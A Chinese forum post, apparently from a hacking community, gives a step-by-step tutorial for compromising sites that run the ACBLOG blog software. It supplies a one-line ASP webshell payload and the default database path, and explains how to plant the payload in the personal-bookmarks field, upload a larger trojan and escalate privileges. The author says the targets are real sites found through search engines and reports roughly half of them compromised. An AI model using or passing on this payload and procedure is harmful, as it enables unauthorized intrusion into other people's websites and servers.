[分享]入侵ACBLOG博客系统
<p>一句话木马的巧利用教程 轻松拿下ACBLOG</p><p><%execute request("value")%> 一句话</p><p>入侵的是个小的BLOG程序"acblog" 没有目标,直接到百度上找.<br/>"acblog"的数据库地址为:blogdata/acblog.asa<br/>这个程序是我在源码之家找到的,下载后发现用户还不少,就用一名话测试后发现<br/>可以用一句话木马得到WEBSHELL</p><p>现在都18页了,我只试了前三页,50%的成功机会,只要默认数据库没改就可以成功,也有例外的<br/>刚才做的,没成功,服务器有过滤,上传的马马都被改了.<br/>接着 检测默认数据库是否存在 </p><p>看很多都没改</p><p>接着看我操作</p><p>先注册,然后写入木马</p><p>个人书签里插入一句话木马,记着,只有这个地方可以插.</p><p>在打开数据库看看,这时就会出错了.</p><p>好慢</p><p>其实不用看一定会出错,我都试过好多了.</p><p>用一句话的客户端 直接传个大马</p><p>看看,进去了.</p><p>呵呵,爽吧,接着就可以提权啦</p><p>教程结束</p><p>这个BLOG程序里面都有个这个文件,我感觉应该是个木马的服务端</p><p><%Application.Contents.RemoveAll()<br/>Response.Write("更新缓存成功!")%></p> 顶啊 继续顶你 呵呵,顶页:
[1]